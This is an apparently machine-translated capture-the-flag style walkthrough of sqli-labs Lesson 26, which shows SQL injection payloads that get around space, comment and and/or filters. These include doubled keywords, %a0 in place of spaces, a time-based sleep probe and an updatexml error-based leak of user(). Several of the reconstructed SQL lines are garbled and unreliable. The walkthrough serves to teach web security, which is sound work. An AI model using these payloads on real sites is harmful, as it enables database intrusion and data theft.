"Sqli-labs" Less26 get-error based-all you SPACES and COMMENTS belong to us (GET type error-based removal of whitespace and annotation injection)

Read the next source

All the annotation forms and backslashes, and,or have been filtered out.

Single quotes without filtering

The space is filtered, too.

Http://localhost/sqli-labs-master/Less-26/?id=1 '

Http://localhost/sqli-labs-master/Less-26/?id=1 "

Look at some of the online methods are using the%A0 replaced the space

Http://localhost/sqli-labs-master/Less-26/?id=1 '%a0oorr%a0 ' 1 ' = ' 1

But a bit of a problem, seems to be unable to identify the character%a0, some people say is the window environment Apache problem

Can be placed first, because this statement can be executed normally

Http://localhost/sqli-labs-master/Less-26/?id=1 ' Oorr ' 1 ' = ' 1

SELECT *  from WHERE id='1'or'1'=  '1'0,1

With this, you can construct such an injection

The value of the ID parameter does not contain a comment that does not contain a space, but can be performed normally when the first character of user () is ' r ', the delay is 1s

http://localhost/sqli-labs-master/Less-26/?id=1 '%26%26sleep (ASCII (Mid (User (), 1) =114)%26%26 ' 1 ' = '

Select *  fromUserswhereId='1'&&SleepASCII(Mid (User(),1,1))= the)&&'1'='1'Limit0,1

Of course, the error message is not masked can also be used Updatexml function direct error to display

http://localhost/sqli-labs-master/Less-26/?id=1 '%26%26updatexml (1,concat (0x7e,user (), 0x7e), 1)%26%26 ' 1 ' = ' 1 

"Sqli-labs" Less26 get-error based-all you SPACES and COMMENTS belong to us (GET type error-based removal of whitespace and annotation injection)